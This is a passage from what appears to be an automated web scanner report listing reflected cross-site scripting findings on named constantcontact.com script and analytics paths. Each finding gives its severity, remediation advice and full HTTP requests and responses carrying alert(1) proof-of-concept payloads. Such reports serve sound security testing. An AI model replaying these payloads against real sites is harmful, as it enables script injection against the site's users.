Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:29 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=E47D25EE6532E73D35EDBA5CA367D8A3.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:29 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:29 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:29 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_scripte90f5';alert(1)//d4c3ecda18a/excanvas.compiled.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
...[SNIP]...

2.157. http://www.constantcontact.com/_script/footnoteLinks.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/footnoteLinks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60f4b'%3balert(1)//08aa0406d3a was submitted in the REST URL parameter 1. This input was echoed as 60f4b';alert(1)//08aa0406d3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_script60f4b'%3balert(1)//08aa0406d3a/footnoteLinks.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:30 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=C2110159A0EC091C81E060253EF5F300.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:30 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:30 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:30 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:30 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_script60f4b';alert(1)//08aa0406d3a/footnoteLinks.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.p
...[SNIP]...

2.158. http://www.constantcontact.com/_script/includes/js/mbox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/includes/js/mbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64890'%3balert(1)//fb12ab3a1d4 was submitted in the REST URL parameter 1. This input was echoed as 64890';alert(1)//fb12ab3a1d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_script64890'%3balert(1)//fb12ab3a1d4/includes/js/mbox.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:42 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=41E4161A5EB779DCC0C83C80AD0FC1F8.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:42 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:42 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:42 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:42 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_script64890';alert(1)//fb12ab3a1d4/includes/js/mbox.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';

...[SNIP]...

2.159. http://www.constantcontact.com/_script/jquery/jquery-1.3.2.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/jquery/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c982e'%3balert(1)//472c31e3bd4 was submitted in the REST URL parameter 1. This input was echoed as c982e';alert(1)//472c31e3bd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_scriptc982e'%3balert(1)//472c31e3bd4/jquery/jquery-1.3.2.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:33 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=BC8613FF029A8A3FCF9EEF031B89BABC.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:33 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:33 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:33 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:33 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_scriptc982e';alert(1)//472c31e3bd4/jquery/jquery-1.3.2.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510
...[SNIP]...

2.160. http://www.constantcontact.com/_script/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bddc7'%3balert(1)//e2bc50926ef was submitted in the REST URL parameter 1. This input was echoed as bddc7';alert(1)//e2bc50926ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_scriptbddc7'%3balert(1)//e2bc50926ef/s_code.js HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1290653400|session#1290653339802-62786#1290655200

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:38 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=6FEED4FC5DE92DB9CBC5C3910FFFFA56.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:38 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:38 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:38 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:38 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_scriptbddc7';alert(1)//e2bc50926ef/s_code.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_143029301421510';
s.prop1=''
...[SNIP]...

2.161. http://www.constantcontact.com/_script/social-media-toolbar.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /_script/social-media-toolbar.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec78'%3balert(1)//77bd47f412a was submitted in the REST URL parameter 1. This input was echoed as dec78';alert(1)//77bd47f412a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_scriptdec78'%3balert(1)//77bd47f412a/social-media-toolbar.js?version=1290097629000 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: impcc="IMP_143029301421510=21456138|"; JSESSIONID=EB1A392709E55046AA656333EB86796F.worker_landingPages; cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; BIGipServerProdLP=2219185162.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:29:36 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=20CC4A5E4EC916A93993B4E2282EFEA9.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:36 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:15.262_EB1A392709E55046AA656333EB86796F.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:36 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510989|prt_01_ts=21510869|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:36 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://www.constantcontact.com/47a5c%3balert(1)//945ccb545ca|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:29:36 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=29030400
Content-Type: text/html;charset=UTF-8
Content-Length: 20957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/_scriptdec78';alert(1)//77bd47f412a/social-media-toolbar.js';
s.server='532';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://www.constantcontact.com/47a5c'%3balert(1)//945ccb545ca';
s.campaign='IMP_14302930142151
...[SNIP]...

2.162. http://www.constantcontact.com/analytics/omniture.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /analytics/omniture.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 887ec'%3balert(1)//a5ecba090b6 was submitted in the REST URL parameter 1. This input was echoed as 887ec';alert(1)//a5ecba090b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /analytics887ec'%3balert(1)//a5ecba090b6/omniture.jsp?action=pv&an=bl&url=blogs.constantcontact.com%2Fcommentary%2F%3Fde329%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eebcb993e5f2%3D1&rs=cc HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; offer_temp=""; BIGipServerProdLP=2252739594.20480.0000; JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:30:51 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=A67EEC9A7BF14EFEAD8F44E6D7EB448A.worker_landingPages; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:51 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:51 GMT; Path=/
Set-Cookie: cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_04_ts=21510990|prt_04=partner.name::ROVING|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:51 GMT; Path=/
Set-Cookie: cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:30:51 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 20970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Foun
...[SNIP]...
<![CDATA[
s.pageName='/analytics887ec';alert(1)//a5ecba090b6/omniture.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1';
s
...[SNIP]...

2.163. http://www.constantcontact.com/analytics/omniture.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /analytics/omniture.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c69ee'%3balert(1)//d212da10a1c was submitted in the REST URL parameter 2. This input was echoed as c69ee';alert(1)//d212da10a1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /analytics/c69ee'%3balert(1)//d212da10a1c?action=pv&an=bl&url=blogs.constantcontact.com%2Fcommentary%2F%3Fde329%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eebcb993e5f2%3D1&rs=cc HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; offer_temp=""; BIGipServerProdLP=2252739594.20480.0000; JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:31:00 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=77E3782AC6FA30DDF279A4EEFF9706E0.worker_landingPages; Path=/
Set-Cookie: cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:31:00 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:31:00 GMT; Path=/
